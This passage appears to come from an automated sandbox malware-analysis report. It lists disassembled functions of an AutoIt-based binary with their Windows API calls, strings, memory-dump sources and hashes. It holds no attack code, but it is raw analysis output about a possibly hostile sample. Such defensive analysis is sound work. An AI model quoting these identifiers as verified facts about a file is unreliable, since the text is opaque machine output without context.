                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5d6f761fe547ce3feb92538ad6612a2a92607529bd12f1059bf7dc4d6a5292f3
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F1E04F72009610AFF7252B11FC05F7377E9EB04320F14896DF59990470EB726C91DB10
                                                                                                                                                                                                                                                                                                    Function 00E9F4FF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • BlockInput.USER32(00000001), ref: 00E9F51A
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: BlockInput
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3456056419-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: cf608f1cf23ba12cee0546e16847fc67e8c3786903c5349b5cd95b655eff9849
                                                                                                                                                                                                                                                                                                    • Instruction ID: 432fd3bedea2faec75548ee810df39f5e808f7135668d0ca8eb38a9fe25f49a6
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cf608f1cf23ba12cee0546e16847fc67e8c3786903c5349b5cd95b655eff9849
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 03E048313002145FC710AF69E80499AF7EDAFA4761F018425F849E7351D670FD418B90
                                                                                                                                                                                                                                                                                                    Function 00E40D45 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,00E4075E), ref: 00E40D4A
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 81204f7a9b42eda65af8ebcbf57a51b95ca1d2eae70ae6ee9c30428d9e0aa155
                                                                                                                                                                                                                                                                                                    • Instruction ID: eda2f06b9bee32ff45b8ba1cdd5b2e0eba93c1ed5e865f308124788a7467f4e2
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 81204f7a9b42eda65af8ebcbf57a51b95ca1d2eae70ae6ee9c30428d9e0aa155
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                                                    Function 00EA353B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00EA358D
                                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00EA35A0
                                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32 ref: 00EA35AF
                                                                                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00EA35CA
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 00EA35D1
                                                                                                                                                                                                                                                                                                    • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00EA3700
                                                                                                                                                                                                                                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00EA370E
                                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EA3755
                                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 00EA3761
                                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00EA379D
                                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EA37BF
                                                                                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EA37D2
                                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EA37DD
                                                                                                                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00EA37E6
                                                                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EA37F5
                                                                                                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00EA37FE
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EA3805
                                                                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00EA3810
                                                                                                                                                                                                                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EA3822
                                                                                                                                                                                                                                                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,00EC0C04,00000000), ref: 00EA3838
                                                                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00EA3848
                                                                                                                                                                                                                                                                                                    • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00EA386E
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00EA388D
                                                                                                                                                                                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EA38AF
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EA3A9C
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                                                                                                                                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                                                                                                                                                    • API String ID: 2211948467-2373415609
                                                                                                                                                                                                                                                                                                    • Opcode ID: 22265dcb5f48bbe6abfb0a2c9e1dcebae8b833fe0c6ad9561d31d16622091148
                                                                                                                                                                                                                                                                                                    • Instruction ID: 7de4d4708176f07c567204d2d774738209e74e28a51cb82a7a436c242905a79f
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 22265dcb5f48bbe6abfb0a2c9e1dcebae8b833fe0c6ad9561d31d16622091148
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 55029F71900215AFDB14CF69DD49EAF7BB9EF89310F148218F905BB2A0DB74AD05CB60
                                                                                                                                                                                                                                                                                                    Function 00E21625 Relevance: 53.0, APIs: 26, Strings: 4, Instructions: 480windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(?,?), ref: 00E216B4
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 00E62B07
                                                                                                                                                                                                                                                                                                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00E62B40
                                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00E62F85
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E21802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E21488,?,00000000,?,?,?,?,00E2145A,00000000,?), ref: 00E21865
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001053), ref: 00E62FC1
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00E62FD8
                                                                                                                                                                                                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?), ref: 00E62FEE
                                                                                                                                                                                                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?), ref: 00E62FF9
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                                                                                                                                                                                                                    • String ID: 0$($($(
                                                                                                                                                                                                                                                                                                    • API String ID: 2760611726-1684351147
                                                                                                                                                                                                                                                                                                    • Opcode ID: c2997785f6b4c94147334f41b3aa1a001dfcd089c8834881d37ddf287b8fa228
                                                                                                                                                                                                                                                                                                    • Instruction ID: 663d887496b66ef3722e4ac93efcdc8a374f9d384c945a82d44693cb0df94791
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c2997785f6b4c94147334f41b3aa1a001dfcd089c8834881d37ddf287b8fa228
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0612D030604611DFC725CF24E844BBABBE1FB94344F18616DF685BB261C772E986CB91
                                                                                                                                                                                                                                                                                                    Function 00EA316E Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(00000000), ref: 00EA319B
                                                                                                                                                                                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00EA32C7
                                                                                                                                                                                                                                                                                                    • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00EA3306
                                                                                                                                                                                                                                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00EA3316
                                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00EA335D
                                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 00EA3369
                                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00EA33B2
                                                                                                                                                                                                                                                                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00EA33C1
                                                                                                                                                                                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 00EA33D1
                                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00EA33D5
                                                                                                                                                                                                                                                                                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00EA33E5
                                                                                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EA33EE
                                                                                                                                                                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 00EA33F7
                                                                                                                                                                                                                                                                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00EA3423
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 00EA343A
                                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00EA347A
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00EA348E
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 00EA349F
                                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00EA34D4
                                                                                                                                                                                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 00EA34DF
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00EA34EA
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00EA34F4
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                                                                                                                                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                                                                                                                                                                    • API String ID: 2910397461-517079104
                                                                                                                                                                                                                                                                                                    • Opcode ID: ac98c4eec6acc74b957bc750cbe132c264b19cecff139f0e5fc1d15cab49223e
                                                                                                                                                                                                                                                                                                    • Instruction ID: 7448fccf5bf0a0a4e0064ef5228629e046e2034ee6cabc1d3a032187bc2ff79a
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ac98c4eec6acc74b957bc750cbe132c264b19cecff139f0e5fc1d15cab49223e
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DFB15DB1A01215AFDB14DFA9DC45FAF7BA9EB49710F104218FA14FB2A0D774AD44CBA0
                                                                                                                                                                                                                                                                                                    Function 00E95524 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 00E95532
                                                                                                                                                                                                                                                                                                    • GetDriveTypeW.KERNEL32(?,00EBDC30,?,\\.\,00EBDCD0), ref: 00E9560F
                                                                                                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,00EBDC30,?,\\.\,00EBDCD0), ref: 00E9577B
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ErrorMode$DriveType
                                                                                                                                                                                                                                                                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                                                                                                                                                                    • API String ID: 2907320926-4222207086
                                                                                                                                                                                                                                                                                                    • Opcode ID: 0517349b7eb241097efaf16ea723a7e7bd9dce079511726b31ccb0aa82c20701
                                                                                                                                                                                                                                                                                                    • Instruction ID: 2377bb0c093a2d3999a7ed2e22f94c26782bf0241966d1c11f12d0ec65216d6d
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0517349b7eb241097efaf16ea723a7e7bd9dce079511726b31ccb0aa82c20701
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 41611832608A49DFCF2ADF65ED928BC77A1EF45314B247016E846BB292D731DE02CB41
                                                                                                                                                                                                                                                                                                    Function 00E22521 Relevance: 42.3, APIs: 18, Strings: 6, Instructions: 282windowtimeCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E225F8
                                                                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000007), ref: 00E22600
                                                                                                                                                                                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E2262B
                                                                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000008), ref: 00E22633
                                                                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 00E22658
                                                                                                                                                                                                                                                                                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00E22675
                                                                                                                                                                                                                                                                                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00E22685
                                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00E226B8
                                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00E226CC
                                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(00000000,000000FF), ref: 00E226EA
                                                                                                                                                                                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 00E22706
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00E22711
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E219CD: GetCursorPos.USER32(?), ref: 00E219E1
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E219CD: ScreenToClient.USER32(00000000,?), ref: 00E219FE
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E219CD: GetAsyncKeyState.USER32(00000001), ref: 00E21A23
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E219CD: GetAsyncKeyState.USER32(00000002), ref: 00E21A3D
                                                                                                                                                                                                                                                                                                    • SetTimer.USER32(00000000,00000000,00000028,00E2199C), ref: 00E22738
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                                                                                                                                                    • String ID: <)$<)$AutoIt v3 GUI$($($(
                                                                                                                                                                                                                                                                                                    • API String ID: 1458621304-3080182634
                                                                                                                                                                                                                                                                                                    • Opcode ID: 26e32b980c7d6378ce53c6f5d18ee95a3fd747b07b26e32040cbcea741f5922c
                                                                                                                                                                                                                                                                                                    • Instruction ID: d0cfc18fc0434fcc94150bc0077e210a693bfb6d997d525853c4f2da4db283e0
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 26e32b980c7d6378ce53c6f5d18ee95a3fd747b07b26e32040cbcea741f5922c
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A0B17B35A40219AFCB14DFA9EC45BEE7BB4FB88314F109229FA05B72A4DB749940CF51
                                                                                                                                                                                                                                                                                                    Function 00EB1A8F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00EB1BC4
                                                                                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00EB1BD9
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 00EB1BE0
                                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00EB1C35
                                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(?), ref: 00EB1C55
                                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00EB1C89
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EB1CA7
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00EB1CB9
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000421,?,?), ref: 00EB1CCE
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00EB1CE1
                                                                                                                                                                                                                                                                                                    • IsWindowVisible.USER32(00000000), ref: 00EB1D3D
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00EB1D58
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00EB1D6C
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00EB1D84
                                                                                                                                                                                                                                                                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00EB1DAA
                                                                                                                                                                                                                                                                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 00EB1DC4
                                                                                                                                                                                                                                                                                                    • CopyRect.USER32(?,?), ref: 00EB1DDB
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000412,00000000), ref: 00EB1E46
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
